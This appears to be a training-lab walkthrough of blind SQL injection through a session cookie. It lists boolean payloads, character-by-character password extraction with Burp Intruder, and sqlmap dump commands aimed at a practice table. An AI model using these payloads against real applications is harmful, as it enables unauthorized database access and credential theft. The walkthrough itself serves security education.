Injection 0x02

First you have to login as a user jeremy to get a valid session cookie

Then forward the GET request with the session to the repeater

Try to put some injection in the cookie session

Blind injection since it is not returning anything just behaviour

Cookie: session=6967cabefd763ac1a1a88e11159957db' or 1=1#

Now we are going to enumerate for the sql version

First we are going to try 7 in the first

But it returns error with content length 1928

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,1) = '7'#

Then when we try 8

We get a access content length with 1027

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,1) = '8'#

Next 

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,3) = '8.0'#

After that we determine that mysql version is 8.0.3

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select version()),1,5) = '8.0.3'#

Now we are going to find some password for jessamy user

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select password from injection0x02 where username = 'jessamy'),1,1) = 'a'#

Put this in intruder

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select password from injection0x02 where username = 'jessamy'), 1, 1) = '§a§'#

Put the alphabet (a-z) (A-Z)

We can see the z and Z are accepted

We can try manually like again but it will take time

The second letter since we know the first letter is z or Z

Cookie: session=6967cabefd763ac1a1a88e11159957db' and substring((select password from injection0x02 where username = 'jessamy'), 2, 1) = '§b§'#

Or we could use the sql map

Just save the GET request with the session cookie

# --level=2 is for the cookie testing
sqlmap -r session.txt --level=2 
# --level=2 is for the cookie testing
# This will dump all data from eah databases/table
sqlmap -r session.txt --level=2 --dump

But we just want the injection 0x02 table

# --level=2 is for the cookie testing
# This will dump all data from table injection0x02
sqlmap -r session.txt --level=2 --dump -T injection0x02

PreviousInjection 0x01NextInjection 0x03 [Challenge]

Last updated